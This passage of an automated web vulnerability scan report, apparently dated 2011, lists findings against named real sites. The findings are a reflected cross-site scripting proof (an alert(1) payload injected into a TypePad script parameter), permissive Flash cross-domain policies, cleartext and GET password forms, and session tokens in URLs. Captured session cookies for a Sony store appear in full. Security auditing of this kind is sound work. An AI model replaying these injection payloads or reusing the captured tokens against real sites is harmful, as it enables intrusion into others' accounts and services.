Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 20:53:00 GMT
Server: Apache
X-Webserver: oak-tp-app002
Cache-Control: private
Pragma: no-cache
Vary: cookie,negotiate,accept-language,Accept-Encoding
Content-Language: en
Content-Length: 14888
Content-Type: text/html; charset=utf-8
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:at="http://www.sixapart.c
...[SNIP]...
lorAnim = YAHOO.util.ColorAnim,
Easing = YAHOO.util.Easing,
Cookie = YAHOO.util.Cookie,
TPToolbar = {};

TPToolbar = {

params: {
autofollowed: 0e142b;alert(1)//db967658d0d,
blog_user_xid: '6p010535f33a5b970c',
display: 0,
entry_xid: '',
logged_in: 0,
safe_to_modify_body: '0',
permal
...[SNIP]...

2. Flash cross-domain policy
There are 4 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


2.1. http://www.viddler.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.viddler.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:09 GMT
Content-Type: application/xml
Connection: close
X-Viddler-Node: viddler_a
Accept-Ranges: bytes
ETag: W/"80-1311663400000"
Last-Modified: Tue, 26 Jul 2011 06:56:40 GMT
Content-Length: 80

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

2.2. http://blog.trendmicro.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: blog.trendmicro.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.54
Content-Type: text/xml
Last-Modified: Fri, 27 Nov 2009 13:41:16 GMT
ETag: "11c044-128-4795a7226b700"
X-Varnish: 1696291533
Cache-Control: no-store
Expires: Tue, 06 Sep 2011 18:16:27 GMT
Date: Tue, 06 Sep 2011 18:16:27 GMT
Content-Length: 296
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.trendmicro.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.rocket-media.info" secure="true" />
...[SNIP]...

2.3. http://wd.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: wd.sharethis.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 17:46:04 GMT
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

2.4. http://www.typepad.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.typepad.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 20:52:09 GMT
Server: Apache
X-Webserver: oak-tp-app017
Cache-Control: private
Pragma: no-cache
Vary: cookie
Content-Length: 401
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="static.typepad.com" />
<allow-
...[SNIP]...
<allow-access-from domain="*.sixapart.com" />
<allow-access-from domain="*.videoegg.com" />
<allow-access-from domain="*.saymedia.com" />
...[SNIP]...

3. Cleartext submission of password
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://webconnect.sendouts.com/login.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /login.aspx

Issue detail

The page contains a form whose action URL, shown in the response below, is submitted over clear-text HTTP. The form contains a password field, also shown in the response below.

Request

GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:31:59 GMT
Content-Length: 6707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<body>

<form name="WebForm1" method="post" action="login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&amp;ID=cfs&amp;SiteID=WebConnect&amp;Group=cfs&amp;Key=CN&amp;CnId=" onsubmit="javascript:return WebForm_OnSubmit();" id="WebForm1">
<div>
...[SNIP]...
<br />
                               <input name="txtPassword" type="password" id="txtPassword" /><span id="RequiredFieldValidator2" class="ErrorMsg" style="color:Red;display:none;">
...[SNIP]...

3.2. http://www.javalobby.org/articles/acegisecurity/part1.jsp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The page contains a form whose action URL, shown in the response below, is submitted over clear-text HTTP. The form contains a password field, also shown in the response below.

Request

GET /articles/acegisecurity/part1.jsp HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:55:34 GMT
Content-Length: 33566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
   <head>

       <title>Securing Your Java Applications - Acegi Security Style</title>
<meta http-equiv="content-type"
...[SNIP]...
<div class="welcomebar">
       
               <form action="/forums/login.jspa" method="post" name="loginform">
               Username/Email: <input type="text" name="username" size="20" maxlength="150" value="" tabindex="1" id="username01" />
               Password: <input type="password" name="password" size="20" maxlength="150" value="" tabindex="2" id="password01" />
               <input type="hidden" name="autoLogin" id="autoLogin01" value="true" />
...[SNIP]...

3.3. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The page contains a form whose action URL, shown in the response below, is submitted over clear-text HTTP. The form contains a password field, also shown in the response below.

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<div id="login" name="login" method="post" action="/community/rtn_login08.php">
<form id="form_login">
<fieldset>
...[SNIP]...
<td>
<input name="upass" type="password" id="jq_password" class="inputtext" />
</td>
...[SNIP]...

4. Session token in URL
There are 4 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://www.sony.com/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Cteonnt-Length: 104997
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 104997
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<link rel="canonical"
...[SNIP]...
<li class="catItem EPP_SONY_SEL_HIDDEN">
<a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1">Business Store</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink">Business Store</a>
...[SNIP]...

4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; 
TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 114876
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:50:12 GMT
Content-Length: 114876
Connection: close
Vary: Accept-Encoding
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<li class="catItem EPP_SONY_SEL_HIDDEN">
<a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1">Business Store</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink">Business Store</a>
...[SNIP]...

4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Cteonnt-Length: 75919
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 75919
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:32 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclu
...[SNIP]...
<li class="catItem EPP_SONY_SEL_HIDDEN">
<a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1">Business Store</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink">Business Store</a>
...[SNIP]...

4.4. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...

5. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The page contains a form whose action URL, shown in the response below, is submitted using the GET method (the form element itself carries no method attribute, so the browser defaults to GET). The form contains a password field, also shown in the response below.

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<div id="login" name="login" method="post" action="/community/rtn_login08.php">
<form id="form_login">
<fieldset>
...[SNIP]...
<td>
<input name="upass" type="password" id="jq_password" class="inputtext" />
</td>
...[SNIP]...

6. ASP.NET ViewState without MAC enabled
There are 3 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

